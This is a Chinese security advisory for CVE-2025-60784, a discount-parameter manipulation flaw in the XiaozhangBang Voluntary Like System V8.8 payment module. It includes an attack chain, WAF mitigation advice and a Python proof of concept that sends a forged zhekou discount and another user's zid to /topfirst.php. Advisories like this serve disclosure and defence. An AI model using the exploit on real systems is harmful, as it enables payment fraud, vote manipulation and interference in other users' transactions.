CVE-2025-60784 小章帮自愿点赞系统V8.8 折扣参数操纵漏洞

漏洞信息

漏洞编号

CVE-2025-60784

漏洞类型

不正确的访问控制

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

XiaozhangBang Voluntary Like System V8.8（小章帮自愿点赞系统）

漏洞概述

CVE-2025-60784是存在于小章帮自愿点赞系统V8.8版本中的一个中危安全漏洞。该漏洞位于系统的支付模块（/topfirst.php）中，攻击者可以通过操纵zhekou（折扣）参数来获得未授权的异常折扣，从而以极低的价格购买投票服务。更为严重的是，攻击者还能通过修改zid参数来影响其他用户的购买行为，这一特性大大放大了漏洞的危害程度。该漏洞的根本原因在于服务器端对用户输入的zhekou和zid参数缺乏充分的验证和权限检查，导致攻击者可以绕过正常的业务逻辑。这不仅可能造成系统运营方的经济损失，还会导致投票计数的公平性被破坏，影响平台的公信力和正常运营秩序。

技术细节

该漏洞属于不正确的访问控制（Incorrect Access Control）类型，存在于小章帮自愿点赞系统的支付处理模块中。攻击者通过向/topfirst.php发送精心构造的HTTP POST请求来利用此漏洞。在正常业务流程中，zhekou参数用于控制购买投票时的折扣比例，系统应该根据预设的规则和用户权限来计算有效的折扣值。然而，由于缺乏服务器端验证，攻击者可以将zhekou参数设置为一个异常低的值（如0或负数），从而绕过正常的定价逻辑，以极低成本购买投票服务。此外，通过修改zid参数，攻击者可以在特定条件下影响其他用户的交易，这种横向越权行为进一步加剧了漏洞的严重性。攻击者无需高级权限，普通注册用户即可实施攻击，这使得漏洞的利用门槛相对较低。成功利用此漏洞可导致非法经济利益获取和投票数据操纵。

攻击链分析

STEP 1

步骤1

攻击者注册并登录小章帮自愿点赞系统，获取有效会话

STEP 2

步骤2

攻击者构造恶意HTTP POST请求，将zhekou参数设置为异常低值（如0.01或0）

STEP 3

步骤3

可选：攻击者修改zid参数指向其他用户，以影响他人的购买行为

STEP 4

步骤4

服务器端缺乏验证，直接使用攻击者提供的zhekou值计算折扣

STEP 5

步骤5

攻击者以极低价格完成投票购买，造成系统经济损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60784 PoC - XiaozhangBang Voluntary Like System V8.8
# Vulnerable Parameter: zhekou (discount) and zid (user ID)

TARGET_URL = "http://target.com/topfirst.php"

def exploit_discount_vulnerability():
    """
    Exploit for CVE-2025-60784: Unauthorized discount via zhekou parameter manipulation
    """
    # Step 1: Login to obtain valid session
    login_url = "http://target.com/login.php"
    login_data = {
        "username": "attacker",
        "password": "password123"
    }
    session = requests.Session()
    # session.post(login_url, data=login_data)
    
    # Step 2: Craft malicious POST request with abnormally low zhekou value
    exploit_data = {
        "zhekou": "0.01",  # Abnormally low discount value
        "zid": "12345",    # Target user ID (optional - for cross-user attack)
        "vote_id": "100",
        "quantity": "100"
    }
    
    # Step 3: Send exploit request
    try:
        response = session.post(TARGET_URL, data=exploit_data, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit sent successfully")
            print(f"[*] Response: {response.text[:200]}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    print("CVE-2025-60784 PoC - XiaozhangBang V8.8")
    exploit_discount_vulnerability()

影响范围

XiaozhangBang Voluntary Like System V8.8

防御指南

临时缓解措施

在官方补丁发布前，可通过配置Web应用防火墙（WAF）规则限制zhekou参数的取值范围，强制校验参数值的合法性；同时对/topfirst.php接口实施临时访问控制，限制非授权用户的访问；建议监控所有包含异常zhekou值的交易请求，及时发现和阻止潜在的利用行为。